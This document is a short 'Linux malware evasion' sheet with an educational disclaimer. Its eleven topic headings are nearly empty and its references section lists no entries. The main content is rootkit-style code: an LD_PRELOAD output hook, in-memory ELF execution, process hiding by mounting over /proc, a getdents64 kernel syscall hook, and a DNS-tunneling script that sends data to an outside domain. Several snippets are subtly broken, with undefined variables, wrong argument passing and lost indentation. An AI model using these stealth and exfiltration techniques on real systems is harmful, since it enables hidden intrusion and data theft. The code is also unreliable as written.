Linux Malware Evasion Techniques

This document summarizes common Linux malware evasion techniques for educational and research purposes.
Disclaimer: This is intended for security research, malware analysis, and detection engineering — do not use for malicious purposes.


1. Process Hiding

Malware often hides its presence from process monitoring tools.


2. Filesystem Stealth

Malware can hide payloads or blend in with legitimate files.


3. Execution Evasion

Avoiding detection by blending into normal system activity.


4. Memory-Only Payloads

Running malicious code entirely in memory.


5. Network Stealth

Hiding C2 (Command & Control) communications and network activity.


6. Anti-Analysis & Persistence

Detecting or avoiding security monitoring tools.


7. Binary Obfuscation & Anti-Forensics

Making malware analysis more difficult through code obfuscation.


8. Privilege Escalation Evasion

Techniques for escalating privileges while avoiding detection.


9. Container & Cloud Evasion

Modern techniques for containerized and cloud environments.


10. Advanced Persistence Mechanisms

Sophisticated methods for maintaining long-term access.


11. Code Injection Techniques

Methods for injecting malicious code into running processes.


12. Practical Code Examples

LD_PRELOAD Hook Example

// hook.c - Simple function hooking
#define _GNU_SOURCE
#include <dlfcn.h>
#include <stdio.h>

int (*original_printf)(const char *format, ...) = NULL;

int printf(const char *format, ...) {
    if (!original_printf) {
        original_printf = dlsym(RTLD_NEXT, "printf");
    }
    // Intercept and filter output
    if (strstr(format, "malware") != NULL) {
        return 0; // Hide lines containing "malware"
    }
    va_list args;
    va_start(args, format);
    int result = original_printf(format, args);
    va_end(args);
    return result;
}

In-Memory ELF Execution

// memfd_exec.c - Execute ELF from memory
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>

int memfd_create(const char *name, unsigned int flags) {
    return syscall(SYS_memfd_create, name, flags);
}

void execute_in_memory(char *elf_data, size_t size) {
    int fd = memfd_create("", MFD_CLOEXEC);
    write(fd, elf_data, size);
    fexecve(fd, argv, envp);
    close(fd);
}

Process Hiding via /proc Manipulation

#!/bin/bash
# hide_process.sh - Hide process from ps output
MALWARE_PID=1234
mount -t tmpfs tmpfs /proc/$MALWARE_PID
echo "Process $MALWARE_PID hidden from /proc"

Syscall Hooking (Kernel Module)

// syscall_hook.c - Hook getdents64 syscall
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/syscalls.h>

static unsigned long **sys_call_table;
static asmlinkage long (*original_getdents64)(unsigned int fd, 
    struct linux_dirent64 __user *dirp, unsigned int count);

asmlinkage long hooked_getdents64(unsigned int fd, 
    struct linux_dirent64 __user *dirp, unsigned int count) {

    long ret = original_getdents64(fd, dirp, count);
    // Filter out malicious entries
    return filter_entries(dirp, ret);
}

DNS Tunneling Example

#!/usr/bin/env python3
# dns_tunnel.py - Simple DNS exfiltration
import base64
import subprocess

def exfiltrate_data(data, domain):
encoded = base64.b64encode(data.encode()).decode()
# Split into DNS-safe chunks
chunks = [encoded[i:i+60] for i in range(0, len(encoded), 60)]

for chunk in chunks:
subdomain = f"{chunk}.{domain}"
subprocess.run(['nslookup', subdomain],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)

References

General Resources

Persistence & Evasion

Memory & Code Injection

Container & Cloud Security

Forensics & Anti-Analysis

Research Papers & Whitepapers

Tools & Frameworks


Author: {X.COM/ALIF101XL} License: MIT INDONESIA